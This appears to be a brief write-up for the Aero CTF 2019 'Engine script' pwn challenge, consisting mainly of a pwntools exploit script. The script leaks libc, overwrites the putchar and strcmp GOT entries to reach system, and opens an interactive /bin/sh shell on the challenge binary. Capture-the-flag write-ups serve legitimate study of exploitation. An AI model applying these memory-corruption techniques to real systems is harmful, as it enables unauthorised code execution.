# Aero CTF 2019 ###### tags: `2019 pwn challenge` ## Engine script We are allowed to write and read data near the bss section. My solution was to: 1. leak libc 2. overwrite strcmp GOT to system 3. overwrite putchar GOT to the address where we can enter the password 4. enter /bin/sh and trigger strcmp('/bin/sh', ....) final script: ```python= from pwn import * #context.log_level = 'DEBUG' context.terminal = ['tmux','splitw','-h'] p = process('./es',env={'LD_PRELOAD':'./libc-2.27.so'}) #gdb.attach(p,'b fflush') elf = ELF('./es') libc = ELF('./libc-2.27.so') stack_addr = 0x0804C0A0 stack_ptr = 0x0804C080 target = 0x080494E0 main = 0x080492A7 """ d -> stack_ptr-- u -> stack_ptr++ g -> *stack_ptr = char p -> print(*stack_ptr) """ #log.info(hex(stack_addr-elf.got['putchar'])) p.recvuntil('Login: ') p.sendline('admin') p.recvuntil(': ') p.sendline('password') to_putchar = stack_addr - elf.got['putchar'] log.info('putchar: '+hex(elf.got['putchar'])) log.info('stack: '+hex(stack_ptr)) # make payload ------------------------------------------------------ cur_stk = stack_addr #/bin/sh\x00 + address of /bin/sh payload = 'g' # leak putchar and modify it to main payload += 'd'*(cur_stk-elf.got['putchar']-3)+'p'+'dp'*3 cur_stk = elf.got['putchar'] payload += 'gu'*4 cur_stk += 4 # modify strcmp to system payload += 'd'*(cur_stk-elf.got['strcmp']) cur_stk = elf.got['strcmp'] payload += 'gu'*4 cur_stk += 4 payload += 'p' # send payload ---------------------------------------------------- p.recvuntil(': ') p.send(payload) libc_leak = u32(('\xf7'+p.recv(4)[1:])[::-1])-libc.sym['putchar'] log.info(hex(libc_leak)) system = libc_leak+libc.sym['system'] log.info('system: '+hex(system)) p.send(p32(main)) #main p.send(p32(system)) p.sendline('/bin/sh') p.sendline('df') p.interactive() ```